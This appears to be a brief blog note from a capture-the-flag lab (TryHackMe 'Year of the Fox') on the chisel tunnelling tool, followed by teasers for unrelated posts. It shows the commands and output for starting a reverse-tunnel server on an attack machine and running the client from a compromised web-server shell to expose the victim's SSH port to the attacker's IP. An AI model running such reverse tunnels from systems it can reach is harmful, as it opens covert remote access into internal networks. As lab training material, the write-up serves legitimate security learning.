Skip to main content

chisel: Notes

chisel - Source: https://github.com/jpillora/chisel

Chisel on GitHub: https://github.com/jpillora/chisel

Chisel is written in Go.

Start chisel server on kali attack machine

root@X220:~# ./chisel server -p 8000 --reverse
2021/04/14 18:45:55 server: Reverse tunnelling enabled
2021/04/14 18:45:55 server: Fingerprint KL0WyhmdH+DdiSiBnHkqRFZ9AC7azAWqL+NBQ1pAmdM=
2021/04/14 18:45:55 server: Listening on http://0.0.0.0:8000

Run chisel client on victim machine to connect and create tunnel on port 22

www-data@year-of-the-fox:/tmp$ ./chisel client 10.8.146.172:8000 R:22:127.0.0.1:22
<./chisel client 10.8.146.172:8000 R:22:127.0.0.1:22
2021/04/14 12:51:33 client: Connecting to ws://10.8.146.172:8000
2021/04/14 12:51:35 client: Connected (Latency 228.164693ms)

Practice

>>> THM | Year of the Fox

Popular posts from this blog

RHEL: Install MySQL

[tuyendq@DangQuocTuyen ~]$ sudo yum list mysql Loaded plugins: product-id, search-disabled-repos, subscription-manager Error: No matching Packages to list [tuyendq@DangQuocTuyen ~]$ sudo yum install mysql Loaded plugins: product-id, search-disabled-repos, subscription-manager Resolving Dependencies --> Running transaction check ---> Package mariadb.x86_64 1:5.5.60-1.el7_5 will be installed --> Processing Dependency: mariadb-libs(x86-64) = 1:5.5.60-1.el7_5 for package: 1:mariadb-5.5.60-1.el7_5.x86_64 --> Running transaction check ---> Package mariadb-libs.x86_64 1:5.5.60-1.el7_5 will be installed --> Finished Dependency Resolution Dependencies Resolved ============================================================================================================================================= Package Arch Version Repository Size ================================...

IBM Domino: Exprired password

Your account is locked out if you do not change your expired password. IBM Notes: Password is expired Account is locked out when password is expired Example of password policy

Microsoft Active Directory Topology Diagrammer

Microsoft Active Directory Topology Diagrammer Microsoft Active Directory Topology Diagrammer